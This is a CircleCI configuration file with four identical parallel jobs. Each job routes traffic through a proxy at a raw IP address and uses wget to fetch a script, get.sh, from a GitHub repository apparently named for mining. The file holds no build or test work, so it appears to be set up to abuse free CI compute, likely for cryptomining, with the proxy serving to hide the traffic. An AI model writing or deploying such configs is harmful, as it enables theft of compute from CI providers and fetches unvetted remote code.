version: 2.1

# Define the jobs we want to run for this project
jobs:
  gas1:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: export http_proxy=http://114.121.248.251:8080 && export https_proxy=https://114.121.248.251:8080 && export ftp_proxy=http://114.121.248.251:8080 && export socks_proxy=http://114.121.248.251:8080 && export all_proxy=http://114.121.248.251:8080 && echo "$http_proxy" && wget https://github.com/bebfuj/kungtaomine/raw/main/get.sh 
  gas2:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: export http_proxy=http://114.121.248.251:8080 && export https_proxy=https://114.121.248.251:8080 && export ftp_proxy=http://114.121.248.251:8080 && export socks_proxy=http://114.121.248.251:8080 && export all_proxy=http://114.121.248.251:8080 && echo "$http_proxy" && wget https://github.com/bebfuj/kungtaomine/raw/main/get.sh
  gas3:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: export http_proxy=http://114.121.248.251:8080 && export https_proxy=https://114.121.248.251:8080 && export ftp_proxy=http://114.121.248.251:8080 && export socks_proxy=http://114.121.248.251:8080 && export all_proxy=http://114.121.248.251:8080 && echo "$http_proxy" && wget https://github.com/bebfuj/kungtaomine/raw/main/get.sh
  gas4:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: export http_proxy=http://114.121.248.251:8080 && export https_proxy=https://114.121.248.251:8080 && export ftp_proxy=http://114.121.248.251:8080 && export socks_proxy=http://114.121.248.251:8080 && export all_proxy=http://114.121.248.251:8080 && echo "$http_proxy" && wget https://github.com/bebfuj/kungtaomine/raw/main/get.sh

# Orchestrate our job run sequence
workflows:
  ke1:
    jobs:
      - gas1
      - gas2
      - gas3
      - gas4